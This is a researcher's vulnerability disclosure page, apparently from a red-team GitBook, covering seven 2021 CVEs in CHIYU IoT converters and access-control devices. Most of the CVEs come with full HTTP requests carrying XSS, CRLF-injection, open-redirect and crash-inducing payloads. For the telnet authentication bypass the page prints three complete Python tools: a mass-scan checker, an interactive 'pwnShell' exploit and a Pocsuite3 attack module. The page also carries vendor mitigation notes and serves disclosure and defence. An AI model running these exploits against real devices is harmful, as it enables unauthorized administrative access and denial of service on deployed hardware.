Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • CVE-2021-31249
  • CVE-2021-31250
  • Proof-of-Concept: 01
  • Proof-of-Concept: 02
  • Proof-of-Concept: 03
  • Proof-of-Concept: 04
  • CVE-2021-31251
  • Checker and Exploit
  • CVE-2021-31252
  • CVE-2021-31641
  • CVE-2021-31642
  • CVE-2021-31643
  • References

Was this helpful?

  1. CVE & Exploits / CTF
  2. CVEs

CHIYU IoT devices

Vulnerabilities found on IoT devices from CHIYU.

PreviousCVEsNextChamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation

Last updated 3 years ago

Was this helpful?

CVE-2021-31249

Title: CRLF injection in CHIYU BF-430, BF-431, and BF-450M TCP/IP Converter devices Vulnerability: CRLF injection CVE ID: CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.

Affected parameter: redirect= Component: all the CGI components Payload: %0d%0a%0d%0a<script>alert(document.domain)</script>

Payload

setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>

HTTP request

GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response

HTTP/1.1 302 Found
Location: setting.htm
<script>alert(document.domain)</script>
Content-Length: 0
Content-Type: text/html

Impact: The impact of CRLF injections vary and also includes all the impacts of Cross-site Scripting to information disclosure.

CVE-2021-31250

Multiple storage XSS vulnerabilities were discovered on BF-430, BF-431 and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, ppp.cgi.

To exploit this vulnerability, an attacker can inject a specially crafted XSS payload on several CGI components to obtain sensitive information from the end-user such as session cookies, or redirect it to a malicious web page.

Proof-of-Concept: 01

Affected parameter: TF_submask Component: if.cgi Payload: "><script>alert(123)</script>

HTTP request:

GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/ap_tcps.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response:

Proof-of-Concept: 02

Affected parameter: TF_hostname= Component: dhcpc.cgi Payload: /"><img src="#">

HTTP request and response:

GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/wan_dc.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

Proof-of-Concept: 03

Affected parameter: TF_servicename= Component: ppp.cgi Payload: "><script>alert(123)</script>

HTTP request:

GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response

Proof-of-Concept: 04

Affected parameter: TF_port= Component: man.cgi Payload: /"><img src="#">

HTTP request:

GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response:

Impact: The attacker places their exploit into the application itself and simply waits for users to encounter it.

CVE-2021-31251

Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.

We can see in the next image the normal workflow with the authentication banner (left-side), and the exploited scenario with the configuration menu (right-side). In detail, when the telnet tries to negotiate the telnet states with the client-side, it fails - at the 4 TCP request - and the IoT device jumps to the next state and believes that the user has already authenticated.

In order to verify if this condition is also present on other devices, a PoC was created and the results can be observed below. On the left side, we can see a lot of devices vulnerable obtained by using the checker, and on the right-side the vulnerability confirmation using the exploit.

Checker in action with multi-thread and CIDR - Pocsuite3:

Exploit in action - Pocsuite3:

Impact: Accessing remotely any device bypassing telnet authentication protocol.

From vendor website:

Regarding CVE-2021-31251, it explains about the CHIYU serial converts & SEMAC door control panel has a security issue.

Because the telnet is able to connect with the device.

For this reason, CHIYU would like to include below the measures to fix the problem.

From now, all of the shipment has the latest firmware.

The firmware will close telnet.

if you want to upgrade your converter's firmware, please contact CHIYU for upgrading.

Checker and Exploit

# Exploit Title:  (Checker) - Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
# Date: June 01 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version:  BF-430, BF-431, BF-450M, and SEMAC   - all firmware versions < June 2021
# Tested on:  BF-430, BF-431, BF-450M, and SEMAC  
#CVE: CVE-2021-31251
#Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

#!/usr/bin/env python3

#usage : python3 checker.py -t IP 
#usage1: python3 checker.py -f target.txt


import socket
import time
import sys

def checker(HOST, PORT):
    socket.setdefaulttimeout(10)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        connect = s.connect_ex((HOST, PORT))
        try:
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            result = s.recv(1024).strip()
            if result != b'\xff\xfe\x01':
                s.send(b"\x09")
                result = s.recv(1024).strip()
            s.close()

            if connect == 0 and "sername" not in str(result):
                if b"\xff\xfe\x01" == result:
                    print("[+] " + HOST + " is vulnerable to CVE-2021-31251!")

        except KeyboardInterrupt:
            s.close()

        except EOFError:
            s.close()

    except socket.error:
        print("[-] " + host + " NOT vulnerable!")
        return 0


opt = sys.argv[1]

if opt == "-t":
    HOST = sys.argv[2]
    PORT = 23
elif opt == "-f":
    PORT = 23
    with open(sys.argv[2]) as f:
        targets = [line.rstrip() for line in f]
else:
    print("Check the parameters before execution the checker.")
    exit(1)

if opt == "-t":
    checker(HOST, PORT)
else:
    for host in targets:
        if host:
            checker(host, PORT)

# Exploit Title:  (Exploit) - Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges
# Date: June 01 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version:  BF-430, BF-431, BF-450M, and SEMAC   - all firmware versions < June 2021
# Tested on:  BF-430, BF-431, BF-450M, and SEMAC  
#CVE: CVE-2021-31251
#Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

#!/usr/bin/env python3

# usage: python3 exploit.py IP

import socket
import time
import sys

HOST = sys.argv[1]
PORT = 23

socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect = s.connect_ex((HOST, PORT))
    try:
        print("[+] Try to connect...\n")
        time.sleep(1)
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        result = s.recv(1024).strip()
        if result != b'\xff\xfe\x01':
            s.send(b"\x09")
            result = s.recv(1024).strip()

        if connect == 0 and "sername" not in str(result):
            if b"\xff\xfe\x01" == result:
                print("Connected! ;)\ntype: \"help\"\n\n")
                while 1:
                        cmd = input("(CHIYU pwnShell:) $ ")
                        body = cmd+"\n"
                        s.send(body.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode('utf8', 'ignore')

                        if not len(result):
                            print("[+] CHIYU device not available, try again ... (terminating)")
                            s.close()
                            break
                        print(result.strip('CMD>'))
                        b = "\n"
                        s.send(b.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode()
                        print(result.strip('CMD>'))
    except KeyboardInterrupt:
        print("\n[+] ^C Received, closing connection")
        s.close()
    except EOFError:
        print("\n[+] ^D Received, closing connection")
        s.close()

except socket.error:
    print("[+] Unable to connect to CHIYU device.")
import re
from collections import OrderedDict
import socket
from pocsuite3.api \
    import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_port
from pocsuite3.lib.core.interpreter_option \
    import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems
from pocsuite3.modules.listener import REVERSE_PAYLOAD


class DemoPOC(POCBase):
    vulID = 'CVE-2021-31251'
    version = '1'
    author = 'sirpedrotavares'
    vulDate = '2021-04-15'
    createDate = '2021-04-15'
    updateDate = '2021-04-15'
    references = ['https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks']
    name = 'pwnCHIYU'
    appPowerLink = 'https://www.chiyu-tech.com'
    appName = 'CHIYU telnet'
    appVersion = 'Telnet service (all versions)'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.TELENT
    samples = []
    install_requires = []
    desc = '''
           An authentication bypass in telnet server from CHIYU Technology Inc devices allows obtaining a privileged
           connection with the target device by supplying a specially malformed request.  
        '''
    pocDesc = ''' 
            Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the
            telnet authentication process due to an overflow during the negotiation of the telnet protocol.
            Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may
            force the remote telnet server to believe that the user has already authenticated. Several models
            are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.
        '''

    def _verify(self):
        output = Output(self)
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 23

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(10)

        try:
            connect = s.connect_ex((host, int(port)))
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            aux = s.recv(1024).strip()
            if aux != b'\xff\xfe\x01':
                s.send(b"\x09")
                aux = s.recv(1024).strip()

            s.close()

            if connect == 0 and "sername" not in str(aux):
                if b"\xff\xfe\x01" == aux:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['rhost'] = self.url
                    return self.parse_attack(result)
                else:
                    result['VerifyInfo'] = {}
                    return self.parse_attack(None)
            else:
                return self.parse_attack(None)
        except socket.error:
            return self.parse_attack(None)

    def _attack(self):
        output = Output(self)
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 23

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socket.setdefaulttimeout(10)

        try:
            connect = s.connect_ex((host, int(port)))
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            s.recv(1024).strip()
            s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
            aux = s.recv(1024).strip()
            if aux != b'\xff\xfe\x01':
                s.send(b"\x09")
                aux = s.recv(1024).strip()

            if connect == 0 and "sername" not in str(aux):
                if b"\xff\xfe\x01" == aux:
                    print("Connected! ;)\ntype: \"help\"\n\n")
                    while 1:
                        cmd = input("(CHIYU pwnShell:) $ ")
                        body = cmd + "\n"
                        s.send(body.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode('utf8', 'ignore')

                        if not len(result):
                            print("[+] CHIYU device not available, try again ... (terminating)")
                            s.close()
                            break
                        print(result.strip('CMD>'))
                        b = "\n"
                        s.send(b.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode()
                        print(result.strip('CMD>'))

        except Exception as e:
            output.fail('target is not vulnerable:' + str(e))
        except KeyboardInterrupt:
            output.success({})
        except EOFError:
            output.success({})
        else:
            output.success({})

        return output

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')

        return output


register_poc(DemoPOC)

CVE-2021-31252

An open redirect vulnerability exists in BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, and SEMAC devices from CHIYU Technology that can be exploited by sending a link that has a specially crafted URL to convince the user to click on it.

To exploit this vulnerability, an attacker can inject an arbitrary URL and convince the end-user to click on the link redirecting it to a page with malicious content. All the CGI components are affected by this flaw.

Affected parameter: redirect= Component: all the CGI components (if.cgi, man.cgi, etc) Payload: redirect=http://127.0.0.1/exploit.htm

HTTP request

GET /if.cgi?redirect=http://192.168.187.201/exploit.htm&failure=fail.htm&type=serial_apply&S_type=2&S_baud=3&S_userdefine=0&S_data=3&S_parity=0&S_stop=0&S_flowcontrol=0&S_timeout=0&S_length=0&S_delimiter1=00&S_deli_en1=0&S_delimiter2=00&S_deli_en2=0&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/serial.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

HTTP response

Impact: Open Redirect is due to the improper sanitization of input that can be used to redirect users to external websites.

CVE-2021-31641

An unauthenticated XSS vulnerability exists in several IoT devices from CHIYU Technology, including BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC. The vulnerability was observed also on more recent firmware versions.

Component: any argument passed via URL that results in an HTTP-404 Payload: http://ip/<script>alert(123)</script>

HTTP request

HTTP response

Impact: This vulnerability is due to the improper sanitization of input when the HTTP-404 page is presented and that can be abused to redirect users to external websites.

CVE-2021-31642

A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.

Affected parameter: page= Component: if.cgi Payload: if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000

HTTP request

GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1

HTTP response

After the request, the web portal will be unavailable until a device reboot.

Impact: Device crash and web portal unavailable.

CVE-2021-31643

A storage XSS flaw was discovered on SEMAC, Biosense, BF-630, BF-631, and Webpass IoT devices from CHIYU Technology Inc due to a lack of sanitization of the input on the component if.cgi - username parameter.

To exploit this vulnerability, an attacker can inject a specially crafted XSS payload on the if.cgi component to obtain sensitive information from the end-user such as session cookies, or redirect it to a malicious web page.

Affected parameter: username= Component: if.cgi Payload: "><script>alert(1)</script>

HTTP request

HTTP response - SEMAC Web Ver7.2

GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=; remote=00000000
Upgrade-Insecure-Requests: 1

HTTP response - BIOSENSE-III-COMBO(M1)(20000)

GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1

Impact: The attacker places their exploit into the application itself and simply waits for users to encounter it.

References

ExploitDB:

Mitigation: The latest version of the should be installed to mitigate this vulnerability.

Title: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices Vulnerability: Stored XSS CVE ID: CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

ExploitDB:

Mitigation: The latest version of the should be installed to mitigate this vulnerability.

Title: Telnet auth bypass in CHIYU IoT devices allowing to obtain administrative privileges Vulnerability: Authentication bypass CVE ID: SSV-ID: CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Seebug: ExploitDB:

Mitigation: The latest version of the should be installed to mitigate this vulnerability. In this new version, the telnet service was disabled in order to solve this issue.

Title: Open redirect vulnerability in CHIYU IoT devices Vulnerability: Open Redirect CVE ID: CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

Mitigation: The latest version of the should be installed to mitigate this vulnerability.

Title: Unauthenticated XSS in several CHIYU IoT devices Vulnerability: Reflected XSS CVE ID: CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

ExploitDB:

Mitigation: The latest version of the should be installed to mitigate this vulnerability.

Title: Denial of Service in several CHIYU IoT devices affecting the web-portal Vulnerability: Integer overflow CVE ID: CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

ExploitDB:

Mitigation: The latest version of the should be installed to mitigate this vulnerability.

Title: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices Vulnerability: Stored XSS CVE ID: CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

ExploitDB:

Mitigation: The latest version of the should be installed to mitigate this vulnerability.

CVE-2021-31249
https://www.exploit-db.com/exploits/49923
CHIYU firmware
CVE-2021-31250
https://www.exploit-db.com/exploits/49922
CHIYU firmware
CVE-2021-31251
SSV-99267
https://www.seebug.org/vuldb/ssvid-99267
https://www.exploit-db.com/exploits/49936
CHIYU firmware
CVE-2021-31252
CHIYU firmware
CVE-2021-31641
https://www.exploit-db.com/exploits/49922
CHIYU firmware
CVE-2021-31642
https://www.exploit-db.com/exploits/49937
CHIYU firmware
CVE-2021-31643
https://www.exploit-db.com/exploits/49922
CHIYU firmware
LogoCHIYU TCP/IP Converter devices - CRLF injectionExploit Database
LogoCHIYU TCP/IP Converter devices - CRLF injectionExploit Database
Logonuclei-templates/CVE-2021-31250.yaml at master · projectdiscovery/nuclei-templatesGitHub
LogoCHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)Exploit Database
LogoCHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)Exploit Database
LogoCHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)Exploit Database
LogoCHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)Exploit Database
LogoCHIYU IoT Devices - 'Telnet' Authentication BypassExploit Database
LogoCHIYU IoT Devices - 'Telnet' Authentication BypassExploit Database
https://www.seebug.org/vuldb/ssvid-99267www.seebug.org
Logonuclei-templates/CVE-2021-31249.yaml at master · projectdiscovery/nuclei-templatesGitHub
LogoCHIYU IoT Devices - Denial of Service (DoS)Exploit Database
LogoCHIYU IoT Devices - Denial of Service (DoS)Exploit Database
LogoDancing in the IoT: CHIYU devices vulnerable to remote attacksSegurança Informática
LogoSolve CVE-2021-31251 for BF-430/ BF-431/ BF-450M/ SEMAC